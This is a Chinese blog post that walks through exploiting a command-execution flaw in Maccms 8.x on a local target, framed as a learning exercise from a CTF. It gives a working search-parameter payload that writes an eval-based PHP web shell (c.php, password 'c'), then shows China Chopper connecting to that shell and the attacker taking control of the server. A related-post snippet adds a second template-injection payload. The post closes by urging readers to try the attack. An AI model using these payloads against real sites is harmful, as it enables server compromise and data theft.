2. 程式人生 > >蘋果cms8.x 命令執行漏洞本地攻擊演示

蘋果cms8.x 命令執行漏洞本地攻擊演示

阿新 發佈:2018-11-06

新出道資訊保安愛好者,有很多需要學習的地方,願有一天能追上大佬步伐。
好了,下面進入正題,上半年6月份參加了鐵人三項賽,線下web題為Maccms8.x ,當時也是通過團隊協作以及百度資源成功破解伺服器,現在我搭建了靶機,具體步驟寫出來。
1.準備:phpstudy+Maccms8.x 原始碼
搭建成功後我們先來訪問一下
在這裡插入圖片描述 因為Maccms8.x 存在命令執行漏洞,所以我們先點選search,接著直接上傳我們構造的一句話木馬payload:wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}
然後直接點選Execute上傳,見上圖hackbar。
驗證是否上傳成功:我們來看一下靶機的源目錄,可以看到多出來一個c.php的檔案,說明上傳已成功。
在這裡插入圖片描述

然後我們直接用菜刀來連線即可(地址:http://localhost/c.php,密碼c)
在這裡插入圖片描述成功連線後,我們可以看到服務機下面的所有檔案了,可以說我們已經控制了這臺伺服器,自此,入侵演示成功。
在這裡插入圖片描述如果有興趣的童鞋趕緊去試試吧。
這條路,很黑很遠,但是我沒有想到,是這麼黑,這麼遠… 致有一顆黑客夢的你!

相關推薦

蘋果cms8.x 命令執行漏洞本地攻擊演示

新出道資訊保安愛好者,有很多需要學習的地方,願有一天能追上大佬步伐。 好了,下面進入正題,上半年6月份參加了鐵人三項賽,線下web題為Maccms8.x ,當時也是通過團隊協作以及百度資源成功破解伺服器,現在我搭建了靶機,具體步驟寫出來。 1.準備:phpstudy+Maccms8.x 原始

Maccms8.x 命令執行漏洞分析

mon 鏈接 文件 https 提交 index.php method if條件 xpl 下載鏈接https://share.weiyun.com/23802397ed25681ad45c112bf34cc6db 首先打開Index.php $m = be(‘ge

ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 遠端命令執行漏洞利用(GetShell)(轉載)

ThinkPHP官方2018年12月9日釋出重要的安全更新,修復了一個嚴重的遠端程式碼執行漏洞。該更新主要涉及一個安全更新,由於框架對控制器名沒有進行足夠的檢測會導致在沒有開啟強制路由的情況下可能的getshell漏洞,受影響的版本包括5.0和5.1版本,推薦儘快更新到最新版本。 漏洞分析 Thin

漏洞預警 | ThinkPHP 5.x遠端命令執行漏洞

ThinkPHP採用面向物件的開發結構和MVC模式,融合了Struts的思想和TagLib(標籤庫)、RoR的ORM對映和ActiveRecord模式,是一款相容性高、部署簡單的輕量級國產PHP開發框架。 近日,ThinkPHP團隊釋出了版本更新資訊,修復一個遠端程式碼執行漏洞。該漏洞是由於框架對控制器名沒

ThinkPHP 5.x 遠端命令執行漏洞復現(GetShell)

注:轉載請註明出自:https://blog.csdn.net/qq_36711453/article/details/84977739 一、簡介 ThinkPHP官方2018年12月9日釋出重要的安全更新,修復了一個嚴重的遠端程式碼執行漏洞。該更新主要涉及一個安全更新,由於框架對控制器名沒

web命令執行漏洞

命令執行漏洞一,什麽是命令執行漏洞: 應用有時需要調用一些執行系統命令的函數,如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,當用戶能控制這些函數中的參數時,就可以將惡意系統命令拼接到正常命令中,從而造成命令執行攻擊,這就是命令執行漏洞。二,利

命令執行漏洞

linux -c log escape 二進制文件 內網滲透 open 網站 style 命令執行 應用有時需要調用一些執行系統命令的函數,如PHP中的system、exec、shell_exec、 passthru、popen、proc_popen等,當用戶能控制這

WordPress <= 4.6 命令執行漏洞(PHPMailer)復現分析

inux 支持 rpo with rec program 遇到 other n) 漏洞信息 WordPress 是一種使用 PHP 語言開發的博客平臺,用戶可以在支持 PHP 和 MySQL 數據庫的服務器上架設屬於自己的網站。也可以把 WordPress 當作一個內容管理

1. 命令執行漏洞簡介

llc ima 命令註入 elastics 分享圖片 HR 服務 服務器 127.0.0.1 命令執行 應用有時需要調用一些執行系統命令的函數, 如PHP中的system、exec、shell_exec、passthru、popen、proc_popen等, 當用

ghostscript 遠程命令執行漏洞復現

dict 依次 tro ict 影響 漏洞 命令執行漏洞 .com put 影響的版本 <= 9.23(全版本、全平臺) Ubuntu 開啟 ghostscript sch01ar@ubuntu:~$ gs -q -sDEVICE=ppmraw -dSAFE

python 代碼審計-命令執行漏洞(自己編寫的代碼)

[1] 問題 錯誤 code 端口掃描 iter turn command att python 代碼審計-命令執行漏洞(自己編寫的代碼) 0x00 源代碼 def execute(request): context ={} ip= request.POS

無線安全審計工具FruityWifi 多處命令執行漏洞

shanghai date Coding bit usr ofo 系統 errors new FruityWIfi是一款有名的無線安全審計的開源工具,其靈感來自於wifipineapple,目前該工具已經更新到2.4。它能夠讓用戶通過web界面來控制和管理模塊,十分方便。F

華碩路由器 Merlin.php 命令執行漏洞

定義 vpd lin 華碩 第一個 and popen函數 ffffff command Merlin.php 面向 ASUS﹣MERLIN 的 SS Web 管理面板。只支持 http://koolshare.io 下的固件版本。 github鏈接:https://git

驗證php的遠端命令執行漏洞案例

比如驗證JBoss EJBInvokerServlet Marshalled Object RCE(CVE-2013-4810 ) 0x01:首先我們開啟php的環境,如phpStudy,wamp等等,這裡我們就使用phpStudy吧,進入php-5.5.38的目錄(當前使用的這個php版本

php程式碼審計命令執行漏洞

命令執行漏洞,使用者通過瀏覽器在遠端伺服器上執行任意系統命令,嚴格意義上,與程式碼執行漏洞還是有一定的區別。  常用命令執行函式 exec()、system()、popen()、passthru()、proc_open()、pcntl_exec()、shell_exec() 、反引

Drupal 遠端命令執行漏洞(CVE-2018-7600)

名稱: Drupal 遠端命令執行漏洞 CVE-ID: CVE-2018-7600 Poc: https://paper.seebug.org/578/ EXPLOIT-DB: https://www.exploit-db.com/exploits/44448/ 平臺: PHP 漏洞描述:

CVE-2018-3191遠端程式碼命令執行漏洞

0x00 weblogic漏洞簡介 北京時間10月17日,Oracle官方釋出的10月關鍵補丁更新CPU(Critical Patch Update)中修復了一個高危的WebLogic遠端程式碼執行漏洞(CVE-2018-3191)。該漏洞允許未經身份驗證的攻擊者通過T3協議網路訪問並破壞易受攻

GoAhead Web伺服器遠端命令執行漏洞(CVE-2017-17562)漏洞復現

一、漏洞概述: 1、漏洞簡介: GoAhead Web Server,它是一個開源(商業許可)、簡單、輕巧、功能強大、可以在多個平臺執行的嵌入式Web Server。 GoAhead Web Server是跨平臺的伺服器軟體,可以穩定地執行在Windows,Linux和

富士施樂 DocuCentre-V 3065 印表機遠端命令執行漏洞

直接上程式碼: Exploit Title: FUJI XEROX DocuCentre-V 3065 Printer - Remote Command Execution Date: 2018-09-05 Exploit Author: vr_system

Maccms8.x 命令執行分析

在很多地方看到有這個漏洞,自己學著分析一下。看到的poc如下 Url:  http://127.0.0.1/index.php?m=vod-search POST:  wd={{page:lang}if-:p{page:lang}hpinfo()}a{endif-}}